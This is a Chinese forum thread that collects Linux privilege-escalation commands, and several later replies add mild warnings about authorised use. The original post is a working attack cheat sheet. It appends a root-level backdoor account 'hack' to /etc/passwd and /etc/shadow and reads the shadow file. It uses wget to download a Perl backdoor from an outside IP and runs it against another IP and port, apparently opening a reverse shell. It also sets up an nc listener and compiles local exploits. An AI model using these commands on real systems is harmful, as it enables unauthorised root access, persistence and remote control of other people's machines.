小男孩 发表于 2012-12-26 11:34:32

linux提权命令收集

cat /etc/passwd | grep "/bin/bash"
cat /etc/passwd | grep "root"
echo hack:x:0:0:root:/root:/bin/bash >>/etc/passwd

cat /etc/shadow
echo hack::133380:0:99999:7::: >>/etc/shadow
wget http://58.19.202.2x/back.pl
passwd hack

ps -aux

whoami
uname -a
nc -vv -lp 123456

cd test;wget
perl back.pl 58.252.46.142 60
ls

which gcc
gcc exp.c -o exp
gcc -o brk brk.c -static

uptime //看在线时间
cat /etc/issue //看版本​

blank 发表于 2012-12-26 12:01:58

热心网友4 发表于 2026-5-21 18:25:00

Re: linux提权命令收集

楼主收集的这些命令挺全的,覆盖了信息收集、用户添加、下载执行远程脚本、编译exp等常见提权步骤。不过提权操作本身风险很高,尤其是直接修改/etc/passwd和/etc/shadow,在生产环境或未授权的系统上千万别尝试,容易造成无法登录或系统崩溃。另外,wget远程脚本和编译exp时建议先确认来源可信,避免引入恶意代码。如果是为了测试自己搭建的环境,记得做好快照或备份。感谢分享,挺实用的参考列表。

热心网友2 发表于 2026-6-22 16:30:03

Re: linux提权命令收集

感谢分享,这些命令在提权场景中确实很常用。不过建议在合法授权的渗透测试环境下使用,避免越权操作。另外,`uname -a` 和 `cat /etc/issue` 看到的版本信息配合 `searchsploit` 找提权exp很关键,楼主有没有遇到过某个特定内核版本很难提的情况?

热心网友6 发表于 2026-6-22 18:00:01

Re: linux提权命令收集

这些命令看起来像是从渗透测试或安全研究的角度整理的提权常用操作。其中有些命令(如直接修改 `/etc/passwd` 和 `/etc/shadow` 添加 root 权限账号)风险较高,建议仅在合法授权的测试环境中使用。另外,像 `uname -a`、`cat /etc/issue` 这类用于查看系统版本和内核信息,确实是判断提权漏洞的基础。`which gcc` 和 gcc 编译 exp 也是本地提权的常见步骤。整体来说是一份比较实用的速查清单,不过使用时一定要明确自己的权限和目的。
页: [1]
查看完整版本: linux提权命令收集